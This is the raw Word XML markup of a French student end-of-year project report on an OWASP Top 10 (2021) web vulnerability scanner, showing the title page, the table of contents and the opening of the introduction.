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A82B8" w14:textId="77777777" w:rsidR="00E86D92" w:rsidRDefault="00E86D92">
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="505050"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E68DD76" wp14:editId="2F6643F0">
            <wp:extent cx="3011265" cy="658570"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="1916198985" name="Picture 2" descr="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s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2152" cy="678447"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A100001" w14:textId="77777777" w:rsidR="00C90802" w:rsidRDefault="00C90802">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="10" w:space="6" w:color="1A2B4A"/>
        </w:pBdr>
        <w:spacing w:after="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A100002" w14:textId="77777777" w:rsidR="00C90802" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="320"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="8A8A8A"/>
          <w:sz w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="8A8A8A"/>
          <w:spacing w:val="120"/>
          <w:sz w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>RAPPORT DE PROJET DE FIN D’ANNÉE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A100003" w14:textId="77777777" w:rsidR="00C90802" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="80"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="80"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Scanner de Vulnérabilités Web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A100004" w14:textId="77777777" w:rsidR="00C90802" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="8B1A1A"/>
          <w:sz w:val="48"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="8B1A1A"/>
          <w:sz w:val="48"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>OWASP Top 10 — 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A100005" w14:textId="77777777" w:rsidR="00C90802" w:rsidRPr="00976FA7" w:rsidRDefault="00C90802">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="4" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:after="280"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A100006" w14:textId="77777777" w:rsidR="00C90802" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="4D4D4D"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="4D4D4D"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Détection automatique des vulnérabilités critiques des applications web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A100007" w14:textId="77777777" w:rsidR="00C90802" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="1200"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="4D4D4D"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="4D4D4D"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>basée sur le référentiel OWASP Top 10 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A100008" w14:textId="77777777" w:rsidR="00C90802" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="10" w:space="8" w:color="1A2B4A"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9020"/>
        </w:tabs>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="8A8A8A"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="8A8A8A"/>
          <w:spacing w:val="80"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>RÉALISÉ PAR</w:t>
        <w:tab/>
        <w:t>ANNÉE UNIVERSITAIRE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7438065B" w14:textId="77777777" w:rsidR="00976FA7" w:rsidRPr="007C23F1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9020"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Fatima Ezzahrae Nouaimi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A100009" w14:textId="6573F6D6" w:rsidR="00C90802" w:rsidRPr="007C23F1" w:rsidRDefault="00976FA7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9020"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Salma el kamili                                                                                                   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="8B1A1A"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>2025 – 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5334ED35" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="007C23F1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="307CFC12" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00E86D92" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="14" w:space="1" w:color="B40000"/>
        </w:pBdr>
        <w:spacing w:before="480"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:sz w:val="36"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Table des Matières</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DF1502" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00E86D92" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Introduction Générale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A35B8BB" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00E86D92" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Chapitre 1 – État de l'Art</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FCB0F5" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">  1.1  Contexte et Enjeux de la Sécurité des Applications Web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1D6460" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">  1.2  Panorama des Cybermenaces Web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A0614A" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">  1.3  Le Référentiel OWASP Top 10 (2021)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC10004" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">  1.4  Vulnérabilités Ciblées : Mécanismes et Impacts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162A72C5" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">  1.5  Outils de Scan Existants — Analyse Comparative</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7581B6D2" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">  1.6  Standards de Scoring : CVSS v3.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4F8C88" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">  1.7  Techniques de Détection Automatique</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CEE2CB" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">  1.8  Synthèse et Positionnement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DF7816" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Chapitre 2 – Conception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590EC4E0" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">  2.1  Architecture Générale du Système</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A399E5" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">  2.2  Diagramme de Cas d'Utilisation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D53BBD5" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">  2.3  Diagramme de Classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4059CBD2" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">  2.4  Diagramme de Séquence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FED116D" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">  2.5  Description Détaillée des Modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C27024" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">  2.6  Technologies et Stack Technique</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42550459" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">  2.7  Environnement de Déploiement — Topologie Réseau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52949A0E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">  2.8  Structure du Projet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E6EF1E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Chapitre 3 – Réalisation et Implémentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B70182F" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">  3.1  Environnement de Travail (Machines Virtuelles)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365C8516" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">  3.2  Implémentation Détaillée des Modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166A77CF" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">  3.3  Interface en Ligne de Commande (CLI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D82F95F" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">  3.4  Suite de Tests Unitaires</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A57BB0" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">  3.5  Scénarios de Test — Études de Cas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B870866" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">  3.6  Résultats Globaux et Analyse de Couverture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5659F577" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">  3.7  Analyse des Performances</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542AA9D9" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Conclusion Générale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C2DEF3" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Bibliographie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EFC014" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A8BB1F" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="14" w:space="1" w:color="B40000"/>
        </w:pBdr>
        <w:spacing w:before="480"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:sz w:val="36"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Introduction Générale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191F77C5" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>La transformation numérique accélérée des dernières décennies a profondément modifié le paysage de la sécurité informatique. Les organisations déplacent massivement leurs services vers le web, exposant des applications critiques à un Internet de plus en plus hostile. En 2023, le coût moyen d'une violation de données a atteint 4,45 millions de dollars selon IBM, un chiffre en hausse de 15 % en trois ans. Les applications web constituent le vecteur d'entrée privilégié des attaquants : simples d'accès, souvent mal sécurisées, elles représentent aujourd'hui 43 % des vecteurs d'attaque initiaux selon le rapport Verizon DBIR 2023.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67427C6F" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Face à cette réalité, la détection proactive des vulnérabilités est devenue une nécessité absolue. Les équipes de développement et de sécurité cherchent des outils capables d'identifier rapidement les failles avant que des acteurs malveillants ne les exploitent. Cependant, les solutions professionnelles comme Burp Suite Pro ou Acunetix sont inaccessibles financièrement pour les PME et les projets académiques, tandis que les outils gratuits manquent souvent de couverture ou de facilité d'intégration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAC8D2E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>C'est dans ce contexte que s'inscrit notre Projet de Fin d'Année (PFA) : la conception et le développement d'un scanner de vulnérabilités web automatisé, open source, léger et modulaire. Notre outil cible spécifiquement les dix catégories de vulnérabilités définies par le référentiel OWASP Top 10 2021 — la référence mondiale en matière de sécurité applicative web. Chaque faille détectée est automatiquement scorée selon le standard CVSS v3.1, et un rapport HTML professionnel est généré à l'issue du scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B11C45" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
